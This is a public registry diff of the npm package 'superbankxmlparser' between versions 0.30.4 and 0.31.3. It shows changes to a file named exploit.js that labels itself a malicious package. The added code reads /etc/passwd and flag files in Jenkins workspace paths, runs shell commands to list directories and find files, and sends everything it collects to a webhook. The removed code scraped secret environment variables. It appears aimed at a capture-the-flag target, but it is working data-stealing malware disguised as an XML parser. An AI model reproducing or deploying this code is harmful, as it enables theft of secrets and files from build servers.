superbankxmlparser 0.30.4 → 0.31.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/exploit.js +42 -37
- package/package.json +1 -1
package/exploit.js
CHANGED
|
@@ -2,7 +2,7 @@ const fs = require('fs');
|
|
|
2
2
|
const { exec } = require('child_process');
|
|
3
3
|
const https = require('https');
|
|
4
4
|
|
|
5
|
-
console.log('=== MALICIOUS PACKAGE
|
|
5
|
+
console.log('=== MALICIOUS LIBXMLJS2 PACKAGE INSTALLED ===');
|
|
6
6
|
|
|
7
7
|
function sendToWebhook(data) {
|
|
8
8
|
try {
|
|
@@ -28,56 +28,61 @@ function sendToWebhook(data) {
|
|
|
28
28
|
}
|
|
29
29
|
}
|
|
30
30
|
|
|
31
|
-
let collectedData = '
|
|
31
|
+
let collectedData = '';
|
|
32
32
|
|
|
33
|
-
// 1.
|
|
34
|
-
|
|
35
|
-
for (let key in process.env) {
|
|
36
|
-
if (key.includes('FLAG') || key.includes('flag') || key.includes('SECRET')) {
|
|
37
|
-
collectedData += `${key}=${process.env[key]}\n`;
|
|
38
|
-
}
|
|
39
|
-
}
|
|
40
|
-
|
|
41
|
-
// 2. Попробуем прочитать флаг из разных мест
|
|
42
|
-
const paths = [
|
|
33
|
+
// 1. Ищем флаг в рабочей директории Jenkins
|
|
34
|
+
const searchPaths = [
|
|
43
35
|
'/etc/passwd',
|
|
44
|
-
'/flag',
|
|
36
|
+
'/flag', // Dockerfile
|
|
37
|
+
'/workspace/flag', // Jenkins workspace
|
|
38
|
+
'/var/jenkins_home/jobs/staging/workspace/flag',
|
|
39
|
+
'/usr/src/app/flag', // App directory
|
|
40
|
+
'./flag', // Current directory
|
|
45
41
|
'/tmp/flag',
|
|
46
|
-
'/
|
|
47
|
-
'/var/lib/jenkins/flag',
|
|
48
|
-
process.env.HOME + '/flag',
|
|
49
|
-
process.env.PWD + '/flag'
|
|
42
|
+
'/root/flag'
|
|
50
43
|
];
|
|
51
44
|
|
|
52
|
-
|
|
45
|
+
searchPaths.forEach(path => {
|
|
53
46
|
try {
|
|
54
47
|
const content = fs.readFileSync(path, 'utf8');
|
|
55
|
-
|
|
48
|
+
console.log(`=== FOUND: ${path} ===`);
|
|
49
|
+
console.log(content);
|
|
50
|
+
collectedData += `=== ${path} ===\n${content}\n\n`;
|
|
51
|
+
|
|
56
52
|
if (content.includes('{') && content.includes('}')) {
|
|
57
|
-
console.log(`🚨 FLAG FOUND
|
|
53
|
+
console.log(`🚨 FLAG FOUND IN ${path}:`, content);
|
|
58
54
|
}
|
|
59
|
-
} catch(e) {
|
|
55
|
+
} catch(e) {
|
|
56
|
+
collectedData += `Not found: ${path}\n`;
|
|
57
|
+
}
|
|
60
58
|
});
|
|
61
59
|
|
|
62
|
-
//
|
|
63
|
-
exec('
|
|
64
|
-
if (!err
|
|
65
|
-
collectedData += `===
|
|
60
|
+
// 2. Список файлов в текущей и корневой директориях
|
|
61
|
+
exec('pwd && ls -la && ls -la /', (err, stdout) => {
|
|
62
|
+
if (!err) {
|
|
63
|
+
collectedData += `=== DIRECTORIES ===\n${stdout}\n\n`;
|
|
66
64
|
}
|
|
67
|
-
|
|
68
|
-
|
|
65
|
+
|
|
66
|
+
// 3. Ищем файл flag рекурсивно
|
|
67
|
+
exec('find /workspace /var/jenkins_home /app /usr/src/app -name "flag" -type f 2>/dev/null', (err, stdout) => {
|
|
69
68
|
if (!err && stdout) {
|
|
70
|
-
collectedData += `=== FOUND FLAG FILES ===\n${stdout}\n`;
|
|
69
|
+
collectedData += `=== FOUND FLAG FILES ===\n${stdout}\n\n`;
|
|
70
|
+
|
|
71
|
+
// Читаем найденные файлы
|
|
72
|
+
const files = stdout.trim().split('\n');
|
|
73
|
+
files.forEach(file => {
|
|
74
|
+
try {
|
|
75
|
+
const content = fs.readFileSync(file, 'utf8');
|
|
76
|
+
collectedData += `=== CONTENT OF ${file} ===\n${content}\n\n`;
|
|
77
|
+
console.log(`Content of ${file}:`, content);
|
|
78
|
+
} catch(e) {}
|
|
79
|
+
});
|
|
71
80
|
}
|
|
72
81
|
|
|
73
|
-
//
|
|
74
|
-
|
|
75
|
-
|
|
76
|
-
|
|
77
|
-
|
|
78
|
-
|
|
79
|
-
sendToWebhook(collectedData);
|
|
80
|
-
console.log(collectedData);
|
|
81
|
-
});
|
|
82
|
+
// Отправляем все данные
|
|
83
|
+
sendToWebhook(collectedData);
|
|
84
|
+
|
|
85
|
+
console.log('=== ALL COLLECTED DATA ===');
|
|
86
|
+
console.log(collectedData);
|
|
82
87
|
});
|
|
83
88
|
});
|